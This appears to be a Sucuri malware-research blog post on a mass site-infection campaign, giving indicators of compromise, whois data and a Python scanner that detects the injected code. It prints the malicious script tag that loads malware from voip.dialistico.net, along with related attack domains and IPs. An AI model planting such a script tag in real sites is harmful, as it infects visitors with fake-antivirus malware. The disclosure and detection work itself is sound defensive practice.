Hilary Kneber at it again: voip.dialistico.net

The Hilary Kneber group is at it again. We are now tracking their usage of voip.dialistico.net to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.

All the infected sites have this malware:

<script src="http://voip.dialistico.net/products/voip.php"..

This script tag is generated by a large string of encoded PHP added to all files in a site. If your site got hacked, we have a cleanup solution here: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html. Some details here too: MW:GDD:3.

The above code loads malware from www4.pc-guard-soft6.net, which is hosted at 69.57.173.221 (from unique-protection.com – famous fake AV site).

And the whois for dialistico.net:

Domain name: dialistico.net
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The domain is hosted at 77.78.239.53, an IP that was also the home of recent attacks:

myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com
voip.dialistico.net
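
A check site owners can run against a copy of their document root, as an added example that is not Sucuri's own tooling: it flags script tags pointing at the hosts named in this post and, in PHP files, long quoted base64-like runs. The base64 shape and the 200-character threshold are assumptions, since the post does not say how the PHP is encoded; the sample files are constructed.

```python
import re
import tempfile
from pathlib import Path

# Hosts named in the post; subdomains of each are matched too.
INDICATOR_HOSTS = ("dialistico.net", "www4.pc-guard-soft6.net",
                   "myblindstudioinfoonline.com", "meqashoppercom.com",
                   "insomniaboldinfocom.com")
# Host in a <script src=...>; the quote may be straight, curly or missing.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"'\u201c\u201d]?\s*(?:https?:)?//([a-z0-9.-]+)", re.I)
# Assumption: the injected "encoded PHP" contains a quoted base64-like run
# of at least 200 characters (threshold chosen for this example).
ENCODED_RUN = re.compile(r"[\"']([A-Za-z0-9+/=]{200,})[\"']")
PHP_SUFFIXES = {".php", ".inc"}
SCANNED_SUFFIXES = PHP_SUFFIXES | {".html", ".htm", ".js", ".tpl"}

def is_indicator(host):
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in INDICATOR_HOSTS)

def scan_text(text, php=False):
    # Findings are (kind, detail) tuples for one file's contents.
    found = [("script-src", m.group(1).lower())
             for m in SCRIPT_SRC.finditer(text) if is_indicator(m.group(1))]
    if php:
        found += [("encoded-run", len(m.group(1)))
                  for m in ENCODED_RUN.finditer(text)]
    return found

def scan_site(root):
    # Walk a document root and map relative path -> findings.
    root, report = Path(root), {}
    for path in sorted(root.rglob("*")):
        suffix = path.suffix.lower()
        if path.is_file() and suffix in SCANNED_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = scan_text(text, php=suffix in PHP_SUFFIXES)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    # Constructed sample site: a clean file, a served page, a tampered PHP file.
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        (site / "clean.php").write_text("<?php echo 'hello'; ?>")
        (site / "index.html").write_text(
            '<script src="http://voip.dialistico.net/products/voip.php"></script>')
        (site / "page.php").write_text("<?php $x = '" + "QUJD" * 100 + "'; ?>")
        return scan_site(site)
```

The script tag normally appears only in served output while the files on disk carry the encoded PHP, so a clean result for one finding kind does not rule out the other.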

We will post more details when we get them.


Is your site hacked? Visit http://sucuri.net and we will clean up the mess for you.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.